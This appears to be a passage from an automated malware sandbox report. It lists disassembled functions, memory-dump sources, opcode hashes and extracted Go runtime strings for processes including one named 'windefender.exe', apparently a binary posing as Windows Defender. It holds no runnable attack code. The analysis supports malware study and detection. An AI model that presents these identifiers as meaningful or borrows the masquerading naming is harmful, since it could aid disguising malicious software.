                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: ios_base::failbit set
                                                                      • API String ID: 3215553584-3924258884
                                                                      • Opcode ID: 918c2305aea0f570d03a744ed01c0d7ddd8fad88daa9e012b788a703a79d1063
                                                                      • Instruction ID: 6d86aa3022823995f9d0a123032e8e32ea02965f57fe95f8692e3504eacbb0dd
                                                                      • Opcode Fuzzy Hash: 918c2305aea0f570d03a744ed01c0d7ddd8fad88daa9e012b788a703a79d1063
                                                                      • Instruction Fuzzy Hash: 2731E722A18F5281E7E15A11D5C0279A260FF86FF0F609631DAAC87BE5DF7DE4128701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A52D4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _handle_errorf
                                                                      • String ID: "$powf
                                                                      • API String ID: 2315412904-603753351
                                                                      • Opcode ID: d592a859933890cdd57d7dbf68ff2918b61bba60df7e98e1b2b9030277a19e82
                                                                      • Instruction ID: 0349652522dac19865302c105cafab63743ad882152677cd4f912efd5c8ecab4
                                                                      • Opcode Fuzzy Hash: d592a859933890cdd57d7dbf68ff2918b61bba60df7e98e1b2b9030277a19e82
                                                                      • Instruction Fuzzy Hash: 03413373D18A80DAD3B0CF22E0847A9B7A0FB9A758F201325F749429E4CFBDD5919B40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A51B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _handle_error
                                                                      • String ID: "$pow
                                                                      • API String ID: 1757819995-713443511
                                                                      • Opcode ID: 6600cf8cc386849cdc45c6f3dac13c67aaf6601de347aff380f29c236909c0c2
                                                                      • Instruction ID: 65fd5647c11dbaf26810c0d5db50c4eeaf3f4ce9b48d579d67ef00e4af3191d4
                                                                      • Opcode Fuzzy Hash: 6600cf8cc386849cdc45c6f3dac13c67aaf6601de347aff380f29c236909c0c2
                                                                      • Instruction Fuzzy Hash: 0E311A72D18E8586D7A0CF10E48076AAAB0FFDA758F201325F78946AA4DFBDD1859B10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A071C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _set_errno_from_matherr
                                                                      • String ID: exp
                                                                      • API String ID: 1187470696-113136155
                                                                      • Opcode ID: b94ccfe877b480f055c56df4a789eadf792ebadbb8a7197ff8c307239036b53c
                                                                      • Instruction ID: 20fb9e5f25510aafc68ef8c73607e8bdecccfd3a69b59d6a75f7e43d19350b33
                                                                      • Opcode Fuzzy Hash: b94ccfe877b480f055c56df4a789eadf792ebadbb8a7197ff8c307239036b53c
                                                                      • Instruction Fuzzy Hash: 6721FF76A19B458BE7A0DF28A48016A73A0FF8AB10F605535E68DC3B95EF3DD4018F00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A0D30, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CompareStringtry_get_function
                                                                      • String ID: CompareStringEx
                                                                      • API String ID: 3328479835-2590796910
                                                                      • Opcode ID: d62702aeeb23d077d50cf64610e65f1c90e7cdd79556739b61dedc982c1fdc6d
                                                                      • Instruction ID: 6588c136ae506542097cb096e242276764914159202dea43466d6c35bb415e19
                                                                      • Opcode Fuzzy Hash: d62702aeeb23d077d50cf64610e65f1c90e7cdd79556739b61dedc982c1fdc6d
                                                                      • Instruction Fuzzy Hash: 49113E36A08B8186D7A0CF55F4802AAB7A0FB8AB94F544135EE8D83B69CF7CD440CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614881A80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                                                                      • String ID: bad locale name
                                                                      • API String ID: 1838369231-1405518554
                                                                      • Opcode ID: 32b908108cd237eb5cba1e8f9bac981e284d381217bdac2534e43f5b9a6d914e
                                                                      • Instruction ID: 67fd0dbda1aebc8f817285bfab17e8ab46eb3778edb7c0a61aedf3a0a2ff753f
                                                                      • Opcode Fuzzy Hash: 32b908108cd237eb5cba1e8f9bac981e284d381217bdac2534e43f5b9a6d914e
                                                                      • Instruction Fuzzy Hash: 17016D2350AF828AC785DF75A88015D77A5FB59F98B189139CA8CC371AEF38D590C340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF61488F4EC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF614889B0E), ref: 00007FF61488F530
                                                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF614889B0E), ref: 00007FF61488F576
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 1c1d4edfab81aec74bcfaf235aa39090f944405d8f8c0753ef25d74ea04d033e
                                                                      • Instruction ID: e61553ecc6fdd81c4d84f20367c53742299d95e0c03645c9c500a4adf6d36c72
                                                                      • Opcode Fuzzy Hash: 1c1d4edfab81aec74bcfaf235aa39090f944405d8f8c0753ef25d74ea04d033e
                                                                      • Instruction Fuzzy Hash: D3113A32618B4282EBA18F15E490269B7A5FB89FA4F284231DF8C477A8DF3CD5518B00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A1054, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: DefaultUsertry_get_function
                                                                      • String ID: GetUserDefaultLocaleName
                                                                      • API String ID: 3217810228-151340334
                                                                      • Opcode ID: 7e8f518c8604ffc61f28e03b5f03f992b79c04bb97c4ed7245e07b4e6ae7fe07
                                                                      • Instruction ID: a4c20fc6f92cb157abb9a1c800c9b2da7b68354402ccfab3d502ca10cb6130bc
                                                                      • Opcode Fuzzy Hash: 7e8f518c8604ffc61f28e03b5f03f992b79c04bb97c4ed7245e07b4e6ae7fe07
                                                                      • Instruction Fuzzy Hash: 40F08210B18D8281FBD49B55B6D45F86251AF4AFE4F649035DA0D87BE5DE6CD445C300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A10B8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                      • String ID: InitializeCriticalSectionEx
                                                                      • API String ID: 539475747-3084827643
                                                                      • Opcode ID: 3e5e89516c3b208d4de2910388d9803b3dbd8c46d2e262e577940497b006c2ed
                                                                      • Instruction ID: eb6d4de2671e8eae8958d0c8f57778737c28760dad467d56908c695aa1cd0f46
                                                                      • Opcode Fuzzy Hash: 3e5e89516c3b208d4de2910388d9803b3dbd8c46d2e262e577940497b006c2ed
                                                                      • Instruction Fuzzy Hash: 8BF0BE25E18F4181EA848B41F4800A86220BF4AFE0FA89031DA1D43BA9CFBCE946C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A0F7C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A0FA5
                                                                      • TlsSetValue.KERNEL32(?,?,0000E117BC86E4D3,00007FF61489EF26,?,?,0000E117BC86E4D3,00007FF6148957A9,?,?,?,?,00007FF6148A507E,?,?,00000000), ref: 00007FF6148A0FBC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Valuetry_get_function
                                                                      • String ID: FlsSetValue
                                                                      • API String ID: 738293619-3750699315
                                                                      • Opcode ID: 0d8a84be871c5973d44aa728ee23869030e7b3f8ed9764413539ddc368b6f7a8
                                                                      • Instruction ID: 88f3608733265744941838cf631406958623979b352a306379110684b379dd4a
                                                                      • Opcode Fuzzy Hash: 0d8a84be871c5973d44aa728ee23869030e7b3f8ed9764413539ddc368b6f7a8
                                                                      • Instruction Fuzzy Hash: AAE06561A18E0291EAC55F50E8800B56222EF4AFB4F788136DA1D876E5CEBCE595C310
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: windefender.exe PID: 5628 Parent PID: 4612 windefender.exeCOMMON

                                                                      Executed Functions

                                                                      Non-executed Functions

                                                                      Function 00428A80, Relevance: 7.6, Strings: 6, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428C2C
                                                                      • ,-./0456:;<=>?@BCLMNOPSZ["\, xrefs: 00428BC0
                                                                      • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filesunknown Go type: %vunknown certificateunknown cipher typeunknown status codeunknown wait , xrefs: 00428B96
                                                                      • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusfailed to apply ACL to, xrefs: 00428C60
                                                                      • bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status failed to %sfailed to %wgcpacertraceget UUID: %wgetaddrinfowhost is , xrefs: 00428C05
                                                                      • ", xrefs: 00428C69
                                                                      Memory Dump Source
                                                                      • Source File: 0000002E.00000002.836135615.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000002E.00000002.836125234.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 0000002E.00000002.837083640.00000000008C3000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000002E.00000002.837096061.00000000008D1000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000002E.00000002.837111983.00000000008D4000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000002E.00000002.837128757.00000000008D7000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000002E.00000002.837148813.00000000008D8000.00000080.00020000.sdmp Download File
                                                                      • Associated: 0000002E.00000002.837163997.00000000008D9000.00000004.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$,-./0456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusfailed to apply ACL to$bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status failed to %sfailed to %wgcpacertraceget UUID: %wgetaddrinfowhost is $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filesunknown Go type: %vunknown certificateunknown cipher typeunknown status codeunknown wait
                                                                      • API String ID: 0-1070706453
                                                                      • Opcode ID: 35bfc13783085809ff100db792aae9c6576bf432ec796ad2e4c0f2543c7307a5
                                                                      • Instruction ID: d05530f15c22603299acca85900aed5cb2d67bbfa8ea3cc37d9bd2921fc2a2af
                                                                      • Opcode Fuzzy Hash: 35bfc13783085809ff100db792aae9c6576bf432ec796ad2e4c0f2543c7307a5
                                                                      • Instruction Fuzzy Hash: E95105B42097118FD340EF29D58575EBBE0FF48708F808A2EE88887352E7389944DF56
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004344A0, Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileunexpected )unknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid heap_marked= , xrefs: 00434566
                                                                      • m->p= next= p->m= prev= span=(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPr, xrefs: 00434588
                                                                      • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestart copied file: %wstartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/br, xrefs: 00434662
                                                                      • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=$WINDIR\rss%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004345D4
                                                                      Memory Dump Source
                                                                      • Source File: 0000002E.00000002.836135615.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000002E.00000002.836125234.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 0000002E.00000002.837083640.00000000008C3000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000002E.00000002.837096061.00000000008D1000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000002E.00000002.837111983.00000000008D4000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000002E.00000002.837128757.00000000008D7000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000002E.00000002.837148813.00000000008D8000.00000080.00020000.sdmp Download File
                                                                      • Associated: 0000002E.00000002.837163997.00000000008D9000.00000004.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=$WINDIR\rss%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPr$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestart copied file: %wstartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileunexpected )unknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid heap_marked=
                                                                      • API String ID: 0-2527030486
                                                                      • Opcode ID: 8b97a09f3ca774cfadb3114678e64e069106bda406771d947f6698ffa7ea8ee8
                                                                      • Instruction ID: 7f80efca96c7c0026b2bbb8fce386263dcbd652a6508ac33117d8161810f2d9f
                                                                      • Opcode Fuzzy Hash: 8b97a09f3ca774cfadb3114678e64e069106bda406771d947f6698ffa7ea8ee8
                                                                      • Instruction Fuzzy Hash: CE51D4B46083158FD704EF25D185B6ABBE0BF88308F41996EE48987352D778D888DF96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: windefender.exe PID: 496 Parent PID: 568 windefender.exeCOMMON

                                                                      Executed Functions

                                                                      Non-executed Functions

                                                                      Function 00428A80, Relevance: 7.6, Strings: 6, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusfailed to apply ACL to, xrefs: 00428C60
                                                                      • bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status failed to %sfailed to %wgcpacertraceget UUID: %wgetaddrinfowhost is , xrefs: 00428C05
                                                                      • ,-./0456:;<=>?@BCLMNOPSZ["\, xrefs: 00428BC0
                                                                      • ", xrefs: 00428C69
                                                                      • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428C2C
                                                                      • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filesunknown Go type: %vunknown certificateunknown cipher typeunknown status codeunknown wait , xrefs: 00428B96
                                                                      Memory Dump Source
                                                                      • Source File: 00000032.00000002.925837140.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000032.00000002.925821610.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000032.00000002.926543002.00000000008C3000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000032.00000002.926560099.00000000008D1000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000032.00000002.926580117.00000000008D4000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000032.00000002.926595109.00000000008D7000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000032.00000002.926608216.00000000008D8000.00000080.00020000.sdmp Download File
                                                                      • Associated: 00000032.00000002.926624820.00000000008D9000.00000004.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$,-./0456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusfailed to apply ACL to$bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status failed to %sfailed to %wgcpacertraceget UUID: %wgetaddrinfowhost is $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filesunknown Go type: %vunknown certificateunknown cipher typeunknown status codeunknown wait
                                                                      • API String ID: 0-1070706453
                                                                      • Opcode ID: 35bfc13783085809ff100db792aae9c6576bf432ec796ad2e4c0f2543c7307a5
                                                                      • Instruction ID: d05530f15c22603299acca85900aed5cb2d67bbfa8ea3cc37d9bd2921fc2a2af
                                                                      • Opcode Fuzzy Hash: 35bfc13783085809ff100db792aae9c6576bf432ec796ad2e4c0f2543c7307a5
                                                                      • Instruction Fuzzy Hash: E95105B42097118FD340EF29D58575EBBE0FF48708F808A2EE88887352E7389944DF56
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004344A0, Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileunexpected )unknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid heap_marked= , xrefs: 00434566
                                                                      • m->p= next= p->m= prev= span=(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPr, xrefs: 00434588
                                                                      • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=$WINDIR\rss%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004345D4
                                                                      • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestart copied file: %wstartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/br, xrefs: 00434662
                                                                      Memory Dump Source
                                                                      • Source File: 00000032.00000002.925837140.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000032.00000002.925821610.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000032.00000002.926543002.00000000008C3000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000032.00000002.926560099.00000000008D1000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000032.00000002.926580117.00000000008D4000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000032.00000002.926595109.00000000008D7000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000032.00000002.926608216.00000000008D8000.00000080.00020000.sdmp Download File
                                                                      • Associated: 00000032.00000002.926624820.00000000008D9000.00000004.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=$WINDIR\rss%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPr$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestart copied file: %wstartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileunexpected )unknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid heap_marked=
                                                                      • API String ID: 0-2527030486
                                                                      • Opcode ID: 8b97a09f3ca774cfadb3114678e64e069106bda406771d947f6698ffa7ea8ee8
                                                                      • Instruction ID: 7f80efca96c7c0026b2bbb8fce386263dcbd652a6508ac33117d8161810f2d9f
                                                                      • Opcode Fuzzy Hash: 8b97a09f3ca774cfadb3114678e64e069106bda406771d947f6698ffa7ea8ee8
                                                                      • Instruction Fuzzy Hash: CE51D4B46083158FD704EF25D185B6ABBE0BF88308F41996EE48987352D778D888DF96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%